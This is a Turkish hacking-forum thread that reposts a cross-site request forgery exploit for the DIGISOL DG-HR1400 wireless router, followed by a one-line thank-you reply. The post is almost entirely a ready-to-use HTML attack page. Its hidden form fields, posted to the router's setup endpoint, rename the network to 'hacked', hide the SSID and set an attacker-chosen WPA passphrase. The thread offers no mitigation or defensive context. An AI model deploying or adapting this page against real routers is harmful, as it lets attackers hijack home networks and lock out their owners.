1.                        

DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery Vulnerability

'Web Application Exploits' forumunda KaliBot tarafından 21 Şubat 2017 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    509
    Beğeniler:
    23
    Ödül Puanları:
    2
    Web Sitesi:
    HTML:
    <html>
       Digisol Router CSRF Exploit - Indrajith A.N
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
          <input type="hidden" name="mode" value="0" />
          <input type="hidden" name="apssid" value="hacked" />
          <input type="hidden" name="startScanUplinkAp" value="0" />
          <input type="hidden" name="domain" value="1" />
          <input type="hidden" name="hiddenSSID" value="on" />
          <input type="hidden" name="ssid" value="hacked" />
          <input type="hidden" name="band" value="10" />
          <input type="hidden" name="chan" value="6" />
          <input type="hidden" name="chanwid" value="1" />
          <input type="hidden" name="txRate" value="0" />
          <input type="hidden" name="method&#95;cur" value="6" />
          <input type="hidden" name="method" value="6" />
          <input type="hidden" name="authType" value="2" />
          <input type="hidden" name="length" value="1" />
          <input type="hidden" name="format" value="2" />
          <input type="hidden" name="defaultTxKeyId" value="1" />
          <input type="hidden" name="key1" value="0000000000" />
          <input type="hidden" name="pskFormat" value="0" />
          <input type="hidden" name="pskValue" value="csrf1234" />
          <input type="hidden" name="checkWPS2" value="1" />
          <input type="hidden" name="save" value="Apply" />
          <input type="hidden" name="basicrates" value="15" />
          <input type="hidden" name="operrates" value="4095" />
          <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    
    #  0day.today [2017-02-21]  #
    
     
  2. Dark Warrior

    Dark Warrior Member

    Katılım:
    10 Eylül 2014
    Mesaj:
    109
    Beğeniler:
    21
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Bilgi İşlem Sorumlusu
    Şehir:
    Van
    Ellerinize Sağlık..
     

Bu Sayfayı Paylaş

Share